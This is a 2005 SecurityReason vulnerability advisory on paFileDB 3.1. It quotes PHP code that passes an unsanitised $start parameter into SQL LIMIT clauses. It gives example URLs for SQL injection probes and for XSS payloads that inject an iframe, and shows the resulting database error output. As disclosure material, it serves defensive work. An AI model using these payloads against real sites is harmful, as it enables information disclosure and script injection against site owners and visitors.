[SECURITYREASON.COM] SQL injection and XSS in paFileDB
-=[ SecurityReason-2005-SRA#03 ]=-
-=[ SQL injection and XSS in paFileDB ]=-
Author: sp3x
Date: 12 March 2005
Affected software :
===================
paFileDB version : =>3.1
Description :
=============
paFileDB is designed to allow webmasters have a database of files for download
on their site.
To add a download, all you do is upload the file using FTP or whatever method
you use, log
into paFileDB's admin center, and fill out a form to add a file. paFileDB lets
you edit and
delete the files too.
No more messing with a bunch of HTML pages for a file database on your site!
Using speedy MySQL for storing data, and powerful PHP for processing
everything, paFileDB is
one of the best and easiest ways to manage files!
SQL injection:
=======================
/includes/viewall.php
/includes/category.php
Code:
-------------------------------------------------------------------------------------------------
if ($sortby == "name") {
$result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files
WHERE file_pin = '0' ORDER BY file_name
ASC LIMIT $start,20", 0);
}
if ($sortby == "date") {
$result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files
WHERE file_pin = '0' ORDER BY file_time
DESC LIMIT $start,20", 0);
}
if ($sortby == "downloads") {
$result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files
WHERE file_pin = '0' ORDER BY file_dls
DESC LIMIT $start,20", 0);
}
if ($sortby == "rating") {
$result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files
WHERE file_pin = '0' ORDER BY
(file_rating/file_totalvotes - 1) DESC LIMIT $start,20", 0);
}
--------------------------------------------------------------------------------------------------
As we can see the $start variable is vuln for sql injection attack.
But this sql injection for now is not critical , why ? because if we want to
inject malicious code to sql sentence
after "ORDER BY" or after "LIMIT", then in current MySql versions, all we can
do, is to fail the sql request. No
UNION-s etc. When we try to inject sql sentence we get : "Wrong usage of UNION
and ORDER BY Error number: 1221" so we
must wait When Mysql version 4.1 will be widely used then we can have something
like this - "ORDER BY desc ASC LIMIT
(SELECT our_table FROM pafiledb_admin)...".
Examples:
=========
Sql injection:
--------------
http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating
http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating
error message :
---------------
paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near '\',20' at
line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_files WHERE
file_pin = '0' ORDER BY
(file_rating/file_totalvotes - 1) DESC LIMIT \',20
Also in this error message we can see the [prefix] pafiledb tables that should
be hidden :)
And we can insert XSS code in error message for example :
Cros Site Scripting (XSS):
--------------------------
http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start=";><iframe%20src=http://www.securityreason.com></iframe
>&sortby=rating
http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start=";><iframe%20src=http://www.securityreason.com></ifram
e>&sortby=date
error message :
---------------
paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near '[Our
XSS]',20' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_files WHERE
file_pin = '0' ORDER BY
(file_rating/file_totalvotes - 1) DESC LIMIT [Our XSS]',20
How to fix :
============
Download the new version of the script or update.
Vendor :
========
No respond
Greetz :
========
Special greetz : cXIb8O3 , pkw :]
Contact :
=========
sp3x[at]securityreason[dot].com
www.securityreason.com